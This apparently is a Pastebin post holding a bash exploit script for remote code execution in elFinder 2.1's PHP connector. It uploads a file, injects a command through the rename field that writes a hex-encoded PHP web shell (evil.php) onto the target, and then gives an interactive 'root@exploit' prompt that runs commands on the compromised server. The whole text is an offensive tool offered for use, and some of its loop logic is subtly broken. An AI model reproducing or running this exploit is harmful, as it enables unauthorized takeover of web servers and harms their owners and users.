Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #Elfinder 2.1 Remote Code Execution
- #By LittleJok3r - @d3pTeam - Maxteroit
- #Sorry if this tool bad :(
- #out = keluar
- site=$1
- if [[ $(curl -s $site/php/connector.minimal.php | grep -o 'errUnknownCmd') =~ 'errUnknownCmd' ]];
- then
- echo "site Looking Vulnerability"
- if [[ $(curl -s -F "reqid=1693222c439f4" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1497726174" -F "upload[]=@evil.jpg" $site/php/connector.minimal.php | grep -o 'l1_ZXZpbC5qcGc') =~ 'l1_ZXZpbC5qcGc' ]];
- then
- echo "Success Uploading !!!"
- if [[ $(curl -s -d "cmd=rename" -d "target=l1_ZXZpbC5qcGc" -d "name=evil.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > evil.php;echo evil.jpg" $site/php/connector.minimal.php | grep -o 'l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw') =~ 'l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw' ]];
- then
- echo "Success Rename File!!!"
- echo "Your Target Look good"
- if [[ $(curl -s "$site/php/connector.minimal.php?target=l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw&width=539&height=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" | grep -o 'errResize') =~ 'errResize' ]];
- then
- echo "please wait"
- if [[ $(curl -s $site/php/evil.php | grep -o 'GIF89a;') =~ 'GIF89a;' ]];
- then
- echo "success exploit!!!"
- read -p "root@exploit : " rce
- for eks in rce; do
- ngewe=$(curl -s "$site/php/evil.php?cmd=$eks")
- echo "$ngewe"
- if [[ $eks =~ 'keluar' ]];
- then
- break
- else
- break
- fi
- done
- else
- echo "Shell Not Found :("
- echo "Rename File Again"
- if [[ $(curl -s -d "cmd=rename" -d "target=l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw" -d "name=evil.php.pjpg" $site/php/connector.minimal.php | grep -o 'removed') =~ 'removed' ]];
- then
- printf "Success Rename!!!\nTry Execution Shell\n"
- read -p "root@exploit : " rce1
- for ekse in rce1; do
- if [[ $ekse =~ 'keluar' ]];
- then
- break
- else
- coli=$(curl -s "$site/php/evil.php.pjpg?cmd=$ekse")
- echo "$coli"
- fi
- done
- else
- echo "still sad :("
- fi
- fi
- else
- echo "Failed Execution :("
- fi
- else
- echo "Failed Rename :("
- fi
- else
- echo "Failed Upload Backdoor"
- fi
- else
- echo "Site Not Vulnerable"
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement